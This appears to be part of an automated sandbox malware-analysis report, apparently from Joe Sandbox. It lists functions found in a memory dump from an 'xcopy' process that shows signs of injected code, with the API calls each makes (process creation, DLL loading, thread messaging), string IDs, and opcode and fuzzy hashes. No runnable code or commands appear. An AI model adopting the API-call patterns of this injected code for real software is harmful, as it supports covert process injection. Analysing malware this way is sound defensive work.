                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4095195033.0000000000A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_a20000_xcopy.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateMemoryVirtual
                                                          • String ID:
                                                          • API String ID: 2167126740-0
                                                          • Opcode ID: b527707c5733c439207fe0623d70904fe5412705355e35f5aec79e9ff37f7a4e
                                                          • Instruction ID: ec9fed9a61cb11becfe44c2210a7c1629fcf71d8dc4f55f22d2d4c7f8a601eb6
                                                          • Opcode Fuzzy Hash: b527707c5733c439207fe0623d70904fe5412705355e35f5aec79e9ff37f7a4e
                                                          • Instruction Fuzzy Hash: 56212BB5A00648AFDB10DF98DC81EEF77B9EF89700F008209FD19A7245D774A911CBA5
                                                          APIs
                                                          • NtClose.NTDLL(?,?,001F0001,?,00000000,?,00000000,00000104), ref: 00A490A4
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4095195033.0000000000A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_a20000_xcopy.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Close
                                                          • String ID:
                                                          • API String ID: 3535843008-0
                                                          • Opcode ID: 67760d01e0e64bfc1f90b50a1059344feaca71bea94d77112bfacca8492087be
                                                          • Instruction ID: b56e114390d6b70c31031e3ab7ccbf67578f5bcce96a32c75a9159a7fffa42ce
                                                          • Opcode Fuzzy Hash: 67760d01e0e64bfc1f90b50a1059344feaca71bea94d77112bfacca8492087be
                                                          • Instruction Fuzzy Hash: 20E0467A2402187BD220BA59DC42FDB77ADEFC5754F008115FA08A7242C6B2B91187E4

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 525 a30be4-a30bf3 526 a30bf5-a30c01 525->526 527 a30c1d-a30c2f call a4b1c0 525->527 531 a30c35-a30c77 call a34320 call a21420 call a41900 527->531 532 a30c30 call a4bbd0 527->532 539 a30c97-a30c9d 531->539 540 a30c79-a30c88 PostThreadMessageW 531->540 532->531 540->539 541 a30c8a-a30c94 540->541 541->539
                                                          APIs
                                                          • PostThreadMessageW.USER32(480O1_3J,00000111,00000000,00000000), ref: 00A30C84
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4095195033.0000000000A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_a20000_xcopy.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID: 480O1_3J$480O1_3J
                                                          • API String ID: 1836367815-2690554099
                                                          • Opcode ID: d6740d5e0b84cbd5609c7ad0194d058a552ca40ef45eb01bd539059a6088f355
                                                          • Instruction ID: af30f92e5638d6caea18749844cb0025307861223f8e34e92fa1885d95410000
                                                          • Opcode Fuzzy Hash: d6740d5e0b84cbd5609c7ad0194d058a552ca40ef45eb01bd539059a6088f355
                                                          • Instruction Fuzzy Hash: 74110676D0014CBF9B109BE89D91DEFBB7CEE94354F04816AF908A7200D6399E068BA1

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 542 a30c0c-a30c2f call a4b1c0 546 a30c35-a30c77 call a34320 call a21420 call a41900 542->546 547 a30c30 call a4bbd0 542->547 554 a30c97-a30c9d 546->554 555 a30c79-a30c88 PostThreadMessageW 546->555 547->546 555->554 556 a30c8a-a30c94 555->556 556->554
                                                          APIs
                                                          • PostThreadMessageW.USER32(480O1_3J,00000111,00000000,00000000), ref: 00A30C84
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4095195033.0000000000A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_a20000_xcopy.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID: 480O1_3J$480O1_3J
                                                          • API String ID: 1836367815-2690554099
                                                          • Opcode ID: 4148ae27c912ebc576e8f7e63a6160e7b45217a378303feb70180a4b1ce13067
                                                          • Instruction ID: a2aa41a0acefb9ac7879892111fe70a701231d938372fb42a307d6835e02de67
                                                          • Opcode Fuzzy Hash: 4148ae27c912ebc576e8f7e63a6160e7b45217a378303feb70180a4b1ce13067
                                                          • Instruction Fuzzy Hash: 3701D6B5D0124CBEDB10ABE48C81DEFBB7CDF44794F458164FA14A7101D6685E068BB1

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 557 a30bb4-a30c77 call a34320 call a21420 call a41900 565 a30c97-a30c9d 557->565 566 a30c79-a30c88 PostThreadMessageW 557->566 566->565 567 a30c8a-a30c94 566->567 567->565
                                                          APIs
                                                          • PostThreadMessageW.USER32(480O1_3J,00000111,00000000,00000000), ref: 00A30C84
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4095195033.0000000000A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_a20000_xcopy.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID: 480O1_3J$480O1_3J
                                                          • API String ID: 1836367815-2690554099
                                                          • Opcode ID: e6d01dc652fb7dd11e177a9f6be44f08902bdcdceff1b8997688135daa992a2f
                                                          • Instruction ID: 3494b062d7db63786d30dc6d4f175ccc0ca5df313127000f3054ca3b66f2b253
                                                          • Opcode Fuzzy Hash: e6d01dc652fb7dd11e177a9f6be44f08902bdcdceff1b8997688135daa992a2f
                                                          • Instruction Fuzzy Hash: E9010875D0115DBADB01ABA0CC91CEFBB7CDE84394F158195FD146B101E6395D068BA1

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 568 a30c10-a30c2f call a4b1c0 572 a30c35-a30c77 call a34320 call a21420 call a41900 568->572 573 a30c30 call a4bbd0 568->573 580 a30c97-a30c9d 572->580 581 a30c79-a30c88 PostThreadMessageW 572->581 573->572 581->580 582 a30c8a-a30c94 581->582 582->580
                                                          APIs
                                                          • PostThreadMessageW.USER32(480O1_3J,00000111,00000000,00000000), ref: 00A30C84
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4095195033.0000000000A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_a20000_xcopy.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: MessagePostThread
                                                          • String ID: 480O1_3J$480O1_3J
                                                          • API String ID: 1836367815-2690554099
                                                          • Opcode ID: 635fbb3421a41ea7d1f45661d1a6f0e6ae89f75bc62972d8ea071f6bc87f1fc0
                                                          • Instruction ID: b1a42dec0e9ffae45695e978e7cac0c5b8f9c8def7d231943d015dfbc1ced3d8
                                                          • Opcode Fuzzy Hash: 635fbb3421a41ea7d1f45661d1a6f0e6ae89f75bc62972d8ea071f6bc87f1fc0
                                                          • Instruction Fuzzy Hash: 6A01F975D0124CBEDB10ABE48C81DEF7B7CDF44794F058164FA1467101D6785E068BB1
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4095195033.0000000000A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_a20000_xcopy.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InitializeUninitialize
                                                          • String ID: @J7<
                                                          • API String ID: 3442037557-2016760708
                                                          • Opcode ID: 096164a65f43e754e5fa53e644c197976b6b08f2faae752b0679774f400e32e3
                                                          • Instruction ID: 99725a136c9dda3b60bff8e99fba5bbb71eff4580a4579169b49e9232404db68
                                                          • Opcode Fuzzy Hash: 096164a65f43e754e5fa53e644c197976b6b08f2faae752b0679774f400e32e3
                                                          • Instruction Fuzzy Hash: D8312DB5A1020AAFDB00DFD9D8809EFB7B9BF88304F108559E516AB214D775EE058BA0
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4095195033.0000000000A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_a20000_xcopy.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InitializeUninitialize
                                                          • String ID: @J7<
                                                          • API String ID: 3442037557-2016760708
                                                          • Opcode ID: 4d843717fa049ff3e74a0776dfc302f229437ad6a9886fb8bf312376b9dacef7
                                                          • Instruction ID: 3354710617d6a92f24bf7e97edf6c9fa9f357846de66992857da9e8a507112a9
                                                          • Opcode Fuzzy Hash: 4d843717fa049ff3e74a0776dfc302f229437ad6a9886fb8bf312376b9dacef7
                                                          • Instruction Fuzzy Hash: BF312DB6A1060A9FDB00DFD8D8809EFB7B9FF88304F108559E516EB214D775EE058BA0
                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00A34392
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4095195033.0000000000A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_a20000_xcopy.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0
                                                          • Opcode ID: c98fb51a9e1d2e40843ab7da1f74b27952c8e00f7a35a2fd68a6b2ef368d7608
                                                          • Instruction ID: 01f2a7200fd832dc1344d57884888ea5c16d1612621631c33ed338119366c1a6
                                                          • Opcode Fuzzy Hash: c98fb51a9e1d2e40843ab7da1f74b27952c8e00f7a35a2fd68a6b2ef368d7608
                                                          • Instruction Fuzzy Hash: B431043590810A9BDF20EF84D885EFDBB65DF1A308F044196FC589B252E672EE18CB90
                                                          APIs
                                                          • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 00A380EA
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4095195033.0000000000A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_a20000_xcopy.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: 57f472909c2d7b36f8b6c7490b5c479bfc317af159c502b721bbda8ea0017340
                                                          • Instruction ID: 4045a60fc56ef26b375e4e76267a629a1c3cb15a175e3894ffa14c002ad11b8a
                                                          • Opcode Fuzzy Hash: 57f472909c2d7b36f8b6c7490b5c479bfc317af159c502b721bbda8ea0017340
                                                          • Instruction Fuzzy Hash: D801942A009BE91ADB261B3888A23DB7F648B03339F58569CFCE10A4D6C719540AD282
                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00A34392
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4095195033.0000000000A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_a20000_xcopy.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0
                                                          • Opcode ID: d6b98b567937928296f7bfcee46d33d0d1baee42ad8d79cd9bd29663671db433
                                                          • Instruction ID: ba52cd0650bc79dba8b61a4347b7695dce5ab768ca9488049bbe7af9df633409
                                                          • Opcode Fuzzy Hash: d6b98b567937928296f7bfcee46d33d0d1baee42ad8d79cd9bd29663671db433
                                                          • Instruction Fuzzy Hash: 83011EB9D4020DBBDB10DBA5DD42F9DB7789B54708F004195B9089B241F671EB148B91
                                                          APIs
                                                          • CreateProcessInternalW.KERNELBASE(00000230,00000258,00000030,?,00A38084,00000010,00000258,?,?,00000044,00000258,00000010,00A38084,?,00000030,00000258), ref: 00A494D0
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4095195033.0000000000A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_a20000_xcopy.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateInternalProcess
                                                          • String ID:
                                                          • API String ID: 2186235152-0
                                                          • Opcode ID: e24fa10a93facbb81396427fa071a12e428fb4fd0239b25f021eae9be2994f39
                                                          • Instruction ID: ad9354dbcc236f795da4783e8a59bf29b679161ed2143abab9e8d1361c709b42
                                                          • Opcode Fuzzy Hash: e24fa10a93facbb81396427fa071a12e428fb4fd0239b25f021eae9be2994f39
                                                          • Instruction Fuzzy Hash: 2B0184B6214608BBCB44DE99DD81EDB77ADAF8C754F508108FA09E3241D670F8518BA4
                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00A34392
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4095195033.0000000000A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_a20000_xcopy.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0
                                                          • Opcode ID: caa329f26759531445c8ecac7f8a50c9d073a426a0ef8d106c42fb11f13c969c
                                                          • Instruction ID: b99a20a7970c43246172110a4abcb9109b718e5be13f8c113a17c50b047aec4f
                                                          • Opcode Fuzzy Hash: caa329f26759531445c8ecac7f8a50c9d073a426a0ef8d106c42fb11f13c969c
                                                          • Instruction Fuzzy Hash: 8DF05C2516899F97EB4DFEB8CD45B8C7B40AB89650F0403ECF1289B0C3D252150695C6
                                                          APIs
                                                          • RtlAllocateHeap.NTDLL(00A31889,?,00A45B81,00A31889,00A4535F,00A45B81,?,00A31889,00A4535F,00001000,?,?,00000000), ref: 00A493CF
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4095195033.0000000000A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_a20000_xcopy.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateHeap
                                                          • String ID:
                                                          • API String ID: 1279760036-0
                                                          • Opcode ID: baa3b6cdea3c91ca57ad97a0b12ec13dc773fd9db494acde4f90a4d4f1f8807b
                                                          • Instruction ID: 8115133e89702f0df6195d72a6677993a4821554d97285a0166777a83cf3a06a
                                                          • Opcode Fuzzy Hash: baa3b6cdea3c91ca57ad97a0b12ec13dc773fd9db494acde4f90a4d4f1f8807b
                                                          • Instruction Fuzzy Hash: D2E092762002097BD610EF98EC41FDB37ECEFC4714F008019F908A7242D670B91087B4
                                                          APIs
                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,0C7D8B00,00000007,00000000,00000004,00000000,00A33C08,000000F4), ref: 00A4941C
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4095195033.0000000000A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_a20000_xcopy.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeHeap
                                                          • String ID:
                                                          • API String ID: 3298025750-0
                                                          • Opcode ID: 6327b2f013aa8d52872de2e3116625fa5956145b8c64010be149d9a6c13f8ac8
                                                          • Instruction ID: 80f4870534c07517d7a1e0f2044de1d2e4a2578016d7fbb2da51ef913ef9df29
                                                          • Opcode Fuzzy Hash: 6327b2f013aa8d52872de2e3116625fa5956145b8c64010be149d9a6c13f8ac8
                                                          • Instruction Fuzzy Hash: FEE06DB52042087BD610EF58DC41FDB33ACEFC9710F008019F908A7241C671BD1087B4
                                                          APIs
                                                          • GetFileAttributesW.KERNELBASE(?,00000002,?,?,000004D8,00000000), ref: 00A380EA
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4095195033.0000000000A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_a20000_xcopy.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: 7a8ba41e1c1702408a3936c72f7f168698bee0d51dc686ef04f05b8fb27d7964
                                                          • Instruction ID: e303ad0d5e8921c637850e2a5092dbd431f4df9c2ddff9f9c104019ba202fd64
                                                          • Opcode Fuzzy Hash: 7a8ba41e1c1702408a3936c72f7f168698bee0d51dc686ef04f05b8fb27d7964
                                                          • Instruction Fuzzy Hash: 6FE026722003086BFB18A7AC9C43F6233588B49738F088661F91CDB2D2D939F8018158
                                                          APIs
                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00A34392
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.4095195033.0000000000A20000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A20000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_a20000_xcopy.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Load
                                                          • String ID:
                                                          • API String ID: 2234796835-0
                                                          • Opcode ID: 659be0d109884b3fdf964b69afc1407a158082cfa7de64f3bded03eee985e34e
                                                          • Instruction ID: 5eecd7d964843c92509c8b52f5dd2503ca203f0d1769c5ddcd3058fc4dba3621
                                                          • Opcode Fuzzy Hash: 659be0d109884b3fdf964b69afc1407a158082cfa7de64f3bded03eee985e34e
                                                          • Instruction Fuzzy Hash: CFC0801544918C774F35CAD8540119CFF54DF87015B04C7CDBC9D57543C7210D195282